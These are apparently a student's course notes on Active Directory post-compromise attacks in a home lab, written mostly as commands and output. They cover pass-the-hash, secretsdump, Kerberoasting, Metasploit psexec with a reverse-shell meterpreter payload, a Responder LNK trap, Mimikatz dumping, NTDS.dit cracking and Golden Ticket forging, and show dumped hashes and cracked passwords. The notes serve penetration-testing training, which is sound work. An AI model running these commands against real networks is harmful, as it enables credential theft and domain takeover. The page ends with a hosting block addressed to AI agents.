# AD - Post-Compromise Attacks ## Pass the Hash ### crackmapexec > 📌 Some commands could not be working since CrackMapExec is no longer mantained -> Jump to [NetExec](#netexec) for working commands ➡️ [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec) - post-exploitation tool that helps automate assessing the security of large Active Directory networks * [CrackMapExec Cheat Sheet 2024 (Commands & Examples) - Stationx](https://www.stationx.net/crackmapexec-cheat-sheet/) **Pass the Password** ```bash crackmapexec smb 192.168.31.0/24 -u fcastle -d MARVEL.local -p Password1 ``` ![Pass the Password](/files/1zZJnGTuq0Xm3gO0TF55) **Pass the Hash** * Use the `administrator` user's hash from the SAM dump ```bash # NTLMv1 necessary crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth ``` ![Pass the Hash](/files/RkACSAtZS2gtJN737Ncl) ```bash # Dump the SAM crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --sam # Enumerate shares (not connected to) crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --shares # Dump LSA secrets crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --lsa ``` ![](/files/EiVbu9Hi8zlz3RhaoXm2) ```bash # Use modules crackmapexec smb -L crackmapexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy ``` ```bash # Check CME DB cmedb hosts creds export creds detailed cme_creds ``` ### netexec ➡️ [netexec](https://github.com/Pennyw0rth/NetExec) ```bash sudo apt install pipx git pipx ensurepath pipx uninstall netexec pipx install git+https://github.com/Pennyw0rth/NetExec ``` ```bash netexec smb 192.168.31.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy # LSASSY 192.168.31.93 445 THEPUNISHER MARVEL\Administrator 920ae267e048417fcfe00f49ecbd4b33 ``` ![](/files/kMy5oP47nPsZZe9JvIzW) ### secretsdump.py ➡️ [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) from `impacket` **e.g.** of lateral movement Hash Attack * LLMNR -> `fcastle` hash -> cracked -> sprayed the password -> new login found -> secretsdump logins -> local admin hashes -> respray the network with local accounts ```bash # Password attack secretsdump.py MARVEL.local/fcastle:'Password1'@spiderman.MARVEL.local secretsdump.py MARVEL.local/fcastle:'Password1'@thepunisher.MARVEL.local # Hash attack secretsdump.py administrator:@spiderman.MARVEL.local -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f ``` ```bash # Check for hashes and clear text passwords (e.g. wdigest) Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f::: frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: [*] Dumping cached domain logon information (domain/username:hash) MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2024-07-15 21:58:30) MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2024-07-28 18:56:22) MARVEL.LOCAL/pparker:$DCC2$10240#pparker#9f28ff35b303d014c9e85e35ab47d019: (2024-07-28 19:01:19) ``` * **e.g.** Cracking NTLMv1 ```bash echo '7facdc498ed1680c4fd1448319a8c04f' > ntlm.txt hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt 7facdc498ed1680c4fd1448319a8c04f:Password1! ``` For mitigation: * Avoid re-using local admin passwords * Disable guest and administrator accounts * Use Privilege Access Management (PAM) *** ## Kerberoasting ➡️ **Kerberoasting** is a post-exploitation attack technique that attempts to obtain a password hash of an Active Directory account that has a **SPN** (Service Principal Name), focusing on the acquisition of **TGS** (Ticket Granting Server) tickets issued by the **KDC** (Key Distribution Center). ### GetUserSPNs.py ➡️ [GetUserSPNs.py](https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py) from `impacket` ```bash sudo GetUserSPNs.py MARVEL.local/fcastle:'Password1' -dc-ip 192.168.31.90 -request ``` ```bash ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation HYDRA-DC/SQLService.MARVEL.local:60111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=MARVEL,DC=local 2024-07-15 23:38:40.092417 2024-07-28 20:48:12.180307 [-] CCache file is not found. Skipping... $krb5tgs$23$*SQLService$MARVEL.LOCAL$MARVEL.local/SQLService*$4dd81eff0870ad344d1eee4aa64e2e7e$da960962a4ecb4aaf3b2b8835173e251537d78af30ac1ed2c464d7983d1a450f51b3d1eb7031adfd93c2b446e46a32d4d3632e6669bb85b1b25ed8ef32a37a54f272616555d3b6dacdb318e018dbf3a6bac8a4254c4c4e43a267abdbbd5ba6710cabad6129db8d723c8c6fbd27e15be1668102e94697fb0ca0bf66fe1b93cc1feec8c00df5338732a7f3e6a7c7a0ba2995af0dcc955a138f1c69d5458908c8f390c4b68d7aa20e2d24dbf3c2615798cf3283faf909cace72e9ccbe74ca5b7b165b55a28141ef3925709ba388af36067bd99e832fa7dc40ae623a8073ad1a7d678037b9f91922301b9313767e92e736996157368e20d67f27964fb2a4336c4234c246ef61945c18d64b5f49638d10b7229ee8fa66bd13f622f8e6a84992b1df1f675e8232df18e39c1b7b9e89e4dd99299ef40eee80c11c32a656c4ce185896c79a51df419d1cf97781cbedbd7048df16db20bc5029e4ad50f69eb067a09eccb93d5ee6f5c539579c7d7120f67a8f92557acd06474ca664b35dbc65f58ff9778370b9aa454298ec8b1c46f16beabe75593a7d370aeb8522eaa21c5b38c46a4c91af4a7b51c91817b4b28bfa3d013bbc46a153d1bc88e025f51bbe641efd0c5c873ff73edc2a89de3a38c3ad80e048bbf901840a4a28affda8bfd10c1a31f4794ae73352c0d8f95a47516079bd45ab16078b27cb7df3a8022aa0e73671b10ebadf0cd1e32ba6225a64122e624305902e7491d422068fe763aa3b53ceba5d4a3a27eaa9e51ed5778301b4804d5525d24516940664701d17f728ae8e039ad6ceda1324e1bd3e18bdc401bf7507705b39c9aedc2389ef50616a2330b00cdb6d6babbc6cbf207cd28b2886e1b9d668b1197ad7b34cc9cc03fb71a7e336a51226062c02ec591085b5dd6ce483799618f139afeb5cc60294f76d632a5344508dc6c133e8a991bb53a84462d0daea9d2b8404306d6cccfde7f5b56c7729c0bf11b0c100998843884efdad3c81e475abab92636a78cc82cf01eabb6f7735cdcdf03344f11b273f07cd2cec194ad238b6f4169c0d13b6c83b1aa91d2137217b583880385d417a24e8cce7dcc0b8d458a1aeeb297a53fae905b332fa1075fe58efc59d7264dbcdae81dad3674790b885e1e093234dbfb22c66f9b44aa19bb7af8d99a1d1b7a70e46fed3fe86d0b703b30037af5c15ca47c8bbc9a3685c4b873e2e22c325f790e9c533540be1bbbb155f68afe4f44646eacf98df3f2cb3e237767f451e700ea540ad3a5c2d14b9dd38b2470a087dfcae87b62e877139da7be443a41e910335d9ab65034d1431f0278135f51d8107a0d3c3ad7776d6ee97a3e9527c6f6e9e52893663e524dcb58ef5242f1a2d9b074a081946e554f416b0e7ba0cd43c666bef7b7af1a542ce0fc8f97028c6cd29cf3cb30d98e3ba8fd0d4fcc26141c8 ``` * **e.g.** Cracking the `$krb5tgs$23$*` (RC4 encryption) hash ```bash nano krb.txt # paste the entire $krb5tgs$23$* hash hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt MYpassword123# # Password of the SQLService account ``` For mitigation: * least privilege - do not run Service Accounts as Domain Admin * strong password *** ## Token impersonation ➡️ Tokens are temporary keys that provide access to a system or network without needing to repeatedly input credentials, similar to how cookies work. * **Delegate** - created for logging into machine or Remote Desktop * **Impersonate** - non-interactive 📌 Turn on `THEPUNISHER` (`192.168.31.93`) and `HYDRA-DC` (`192.168.31.90`) VMs, and login to `THEPUNISHER`. ```bash msfconsole use exploit/windows/smb/psexec set payload windows/x64/meterpreter/reverse_tcp set rhosts 192.168.31.93 set smbdomain MARVEL.local set smbuser fcastle set smbpass Password1 show targets # proceed with Automatic run # meterpreter - load addon load incognito # List available tokens list_tokens -u Delegation Tokens Available ======================================== Font Driver Host\UMFD-0 Font Driver Host\UMFD-1 Font Driver Host\UMFD-2 MARVEL\Administrator MARVEL\fcastle NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Window Manager\DWM-1 Window Manager\DWM-2 Impersonation Tokens Available ======================================== No tokens available # Impersonate token impersonate_token marvel\\fcastle # Check impersonated user shell whoami # Add another Domain Admin user net user /add hawkeye Password1@ /domain net group "Domain Admins" hawkeye /ADD /DOMAIN # Revert to original token rev2self ``` * Dump the secrets from the controller using `hawkeye` user ```bash secretsdump.py MARVEL.local/hawkeye:'Password1@'@hydra-dc.MARVEL.local ``` For mitigation: * limit user/group token creation permission * account tiering * local admin restriction *** ## LNK File attack An attacker can place a malicious file in a shared folder, and when triggered, it captures password hashes using a tool like Responder, similar to a **watering hole attack** where a compromised website delivers malware that can drop such files onto a target's network. 📌 Open Powershell on the `THEPUNISHER` (`192.168.31.93`) VM. * The following PowerShell script creates a shortcut (`C:\test.lnk`) pointing to a remote file (`\\192.168.31.131\@test.png` - on the attacker VM), setting its icon, description, and a `Ctrl+Alt+T` hotkey. It can be used for automation or to trick users into accessing a remote resource, potentially leaking credentials via an SMB request. ```powershell $objShell = New-Object -ComObject WScript.shell $lnk = $objShell.CreateShortcut("C:\test.lnk") $lnk.TargetPath = "\\192.168.31.131\@test.png" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "Test" $lnk.HotKey = "Ctrl+Alt+T" $lnk.Save() ``` * rename the `test.lnk` file into `@test.lnk` to put it on top of the folder list * copy the file in `\\hydra-dc\hackme` file share Run Responder (on Kali VM): ```bash sudo responder -I eth0 -dPv ``` No just open the `\\hydra-dc\hackme` share folder in `THEPUNISHER` VM and check the Responder log for hashes automatically captured. ![](/files/j27bbY36fe8sM2Uj4tW5) **Automated attack** - ff the file share is exposed, use `netexec` [slinky](https://github.com/seriotonctf/cme-nxc-cheat-sheet?tab=readme-ov-file#slinky) built-in module to create the link/shortcut file on the targeted VM (in all shares with write permissions). ```bash netexec smb 192.168.31.131 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.31.90 ``` *** ## GPP Attacks - cPassword attacks ➡️ The Group Policy Preferences (**GPP**) allowed admins to create policies with embedded credentials. * credentials were encrypted and stored in the **cPassword** field * **encryption key** was leaked, making it possible to decrypt stored credentials * patched in [MS14-025](https://learn.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-025), but previously stored credentials remain vulnerable, so it is still relevant for pentesting ```cmd findstr /S /I cpassword \\marvel.local\sysvol\marvel.local\policies\*.xml ``` For mitigation: * Install `KB2962486` on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences. * Delete existing GPP `xml` files in SYSVOL containing passwords. Good article - [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences – Active Directory Security](https://adsecurity.org/?p=2288) *** ## Credential dumping with Mimikatz ➡️ [Mimikatz](https://www.kali.org/tools/mimikatz/) - a tool that allows the extraction of plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. It can also perform **pass-the-hash**, **pass-the-ticket** or build **Golden** tickets. 📌 Turn on `SPIDERMAN` (`192.168.31.92`) and login with `peterparker` with the attached `hackme` file-share. ```bash mkdir -p $HOME/tcm/peh/ad-attacks/mimikats cd $HOME/tcm/peh/ad-attacks/mimikats wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip # extract zip python3 -m http.server 80 ``` * Open `http://192.168.31.131/mimikatz_trunk/x64/` in the `SPIDERMAN` VM and download all the 4 files inside that directory * Run `cmd` as admin ```bash cd "C:\Users\peterparker\Downloads" mimikatz.exe # Commands privilege:: privilege::debug # Attacks sekurlsa:: msv - Lists LM & NTLM credentials wdigest - Lists WDigest credentials kerberos - Lists Kerberos credentials tspkg - Lists TsPkg credentials livessp - Lists LiveSSP credentials cloudap - Lists CloudAp credentials ssp - Lists SSP credentials logonPasswords - Lists all available providers credentials process - Switch (or reinit) to LSASS process context minidump - Switch (or reinit) to LSASS minidump context bootkey - Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials pth - Pass-the-hash krbtgt - krbtgt! dpapisystem - DPAPI_SYSTEM secret trust - Antisocial backupkeys - Preferred Backup Master keys tickets - List Kerberos tickets ekeys - List Kerberos Encryption Keys dpapi - List Cached MasterKeys credman - List Credentials Manager sekurlsa::logonPasswords ``` ![](/files/b77eSa6S6fP42aizuOWL) * Check for clear-text passwords based on the mounted shared folder for example. * Check for NTLM hashes. * **Mimikatz needs obfuscation and/or antivirus bypass to work on protected systems.** *** ## 📌 **Attack strategy for internal pentest** * Account compromised * Quick wins: * Pass the hash * Secrets dump * Pass the hash/password * Dig deeper: * Enumerate (Bloodhound, users, domain admins, sensitive VMs, etc) * Account access * Old vulnerabilities * **"Think outside the box"** * *How can I move laterally until I can move vertically?* *** ## 📌 Post-Domain Compromise Actions Once the domain is owned: * **Maximize value for the client:** * Repeat the process for verification * Dump `NTDS.dit` and crack passwords * Enumerate shares for sensitive data * **Maintain persistence:** * Plan for lost **Domain Admin (DA) access** * Create a temporary **DA account** (remember to delete it) * Use a **Golden Ticket** if needed *** ## Dumping NTDS.dit ➡️ `NTDS.dit` is the Active Directory database file used by Microsoft Windows Domain Controllers (**DCs**). It stores critical domain information, including: * User and computer accounts * Password hashes * Group memberships and permissions It is important because: * it contains NTLM & Kerberos password hashes, making it a prime target for attackers * if dumped using tools like `Mimikatz` or `secretsdump.py`, attackers can crack hashes and gain **Domain Admin access** * it enables **privilege escalation** and **persistent access** (`e.g.` Golden Ticket attacks). ```bash secretsdump.py MARVEL.local/hawkeye:'Password1@'@hydra-dc.MARVEL.local -just-dc-ntlm > ntds.txt ``` ```bash [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:21a84dbb8f81aa02316606b488a4a9eb::: MARVEL.local\tstark:1601:aad3b435b51404eeaad3b435b51404ee:35efba6f2e4bff313e474477bb3947b0::: MARVEL.local\SQLService:1602:aad3b435b51404eeaad3b435b51404ee:f4ab68f27303bcb4024650d8fc5f973a::: MARVEL.local\fcastle:1603:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: MARVEL.local\pparker:1604:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: bkVKFfXduD:1607:aad3b435b51404eeaad3b435b51404ee:2622b132931c05c7906da9d35e12fbb2::: hawkeye:1608:aad3b435b51404eeaad3b435b51404ee:43460d636f269c709b20049cee36ae7a::: HYDRA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:327be301d1b220fcc6612deab852b321::: THEPUNISHER$:1605:aad3b435b51404eeaad3b435b51404ee:4024a6cb78ffd9195b7f53697994ed32::: SPIDERMAN$:1606:aad3b435b51404eeaad3b435b51404ee:c8ad84ab1f78981322a0618060c0e82c::: [*] Cleaning up... ``` * Get only the NT hashes from the response and try to crack them ```bash # ntds.txt 920ae267e048417fcfe00f49ecbd4b33 31d6cfe0d16ae931b73c59d7e0c089c0 21a84dbb8f81aa02316606b488a4a9eb 35efba6f2e4bff313e474477bb3947b0 f4ab68f27303bcb4024650d8fc5f973a 64f12cddaa88057e06a81b54e73b949b 64f12cddaa88057e06a81b54e73b949b 2622b132931c05c7906da9d35e12fbb2 43460d636f269c709b20049cee36ae7a 327be301d1b220fcc6612deab852b321 4024a6cb78ffd9195b7f53697994ed32 c8ad84ab1f78981322a0618060c0e82c ``` ```bash hashcat -m 1000 ntds.txt /usr/share/wordlists/rockyou.txt hashcat -m 1000 ntds.txt /usr/share/wordlists/rockyou.txt --show > ntds_hashcat.txt ``` ```bash # Check the users cracked hashes Administrator - 920ae267e048417fcfe00f49ecbd4b33:P@$$w0rd! Guest - 31d6cfe0d16ae931b73c59d7e0c089c0: MARVEL.local\SQLService - f4ab68f27303bcb4024650d8fc5f973a:MYpassword123# MARVEL.local\fcastle - 64f12cddaa88057e06a81b54e73b949b:Password1 MARVEL.local\pparker - 64f12cddaa88057e06a81b54e73b949b:Password1 hawkeye - 43460d636f269c709b20049cee36ae7a:Password1@ ``` *** ## Golden Ticket ➡️ A **Golden Ticket attack** is a **Kerberos** authentication exploit that allows an attacker to generate forged **TGTs** (Ticket Granting Tickets), granting them **persistent** and **unrestricted access** to an Active Directory (AD) environment. 1. **Obtain the KRBTGT Hash** – The attacker dumps the **KRBTGT account**'s NTLM hash from the **NTDS.dit** database on a domain controller. 2. **Forge a TGT** – Using `Mimikatz`, the attacker crafts a fake Kerberos TGT, setting any username, groups, or privileges. 3. **Gain Domain Access** – The forged ticket is used (via **Pass-the-Ticket** attack) to request service tickets (**TGS**), allowing access to any resource without authentication expiration. 4. **Persistence** – The ticket remains valid even if passwords change, as long as the KRBTGT hash is not reset twice. > ❗ When `KRBTGT` (Kerberos Ticket Granting Ticket) account is compromised, the attacker owns the domain. ### Pass the Ticket - mimikatz 📌 Turn on `THEPUNISHER` (`192.168.31.93`) and `HYDRA-DC` (`192.168.31.90`) VMs. * Download `Mimikatz` on the Domain Controller VM * Run `cmd` as admin on the `HYDRA-DC`. Proceed to forging a golden ticket with `Mimikatz` ```bash cd "C:\Users\fcastle\Downloads\mimikatz_trunk\x64" mimikatz.exe # Commands privilege::debug lsadump::lsa /inject /name:krbtgt ``` * Get the Domain SID and NTLM hash of the `krbtgt` account from the output ```bash S-1-5-21-1796002695-2329991732-2223296958 21a84dbb8f81aa02316606b488a4a9eb ``` * Back in `Mimikatz`, generate the **golden ticket** ```bash kerberos::golden /User:MyAdministrator /domain:marvel.local /sid:S-1-5-21-1796002695-2329991732-2223296958 /krbtgt:21a84dbb8f81aa02316606b488a4a9eb /id:500 /ptt # id:500 - Administrator account # ptt - pass the ticket into the session ``` ![](/files/zoVT7MXF1PrWOANgzT6W) The attacker can use the forged ticket to access Kerberos-integrated resources. Since the TGT is signed and encrypted with the legitimate KRBTGT password hash, domain controllers recognize it as valid authentication. As a result, the domain controller issues **Ticket Granting Service (TGS)** tickets based on the forged TGT. * To open a session with the generated golden ticket: ```bash misc::cmd ``` ```bash # In the new CMD, run privileged commands dir \\THEPUNISHER\c$ ``` * [Download](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec) and use `psexec.exe` to run attacks against other computers or get a remote shell on them ```bash cd "C:\Users\tstark\Downloads\PSTools>" PsExec.exe \\THEPUNISHER cmd.exe hostname ``` ![](/files/uijZXXBfe8wBRTkNNLoZ) `Impacket` from the Kali VM can be used too for the Pass the Ticket attack using `secretdump.py` , `lookupsid.py`, `ticketer.py`, `psexec.py`. * [Golden Ticket Attack Explained - MITRE ATT\&CK T1558.001](https://www.picussecurity.com/resource/blog/golden-ticket-attack-mitre-t1558.001) *** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.syselement.com/tcm/courses/peh/4-active-directory/4-ad-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.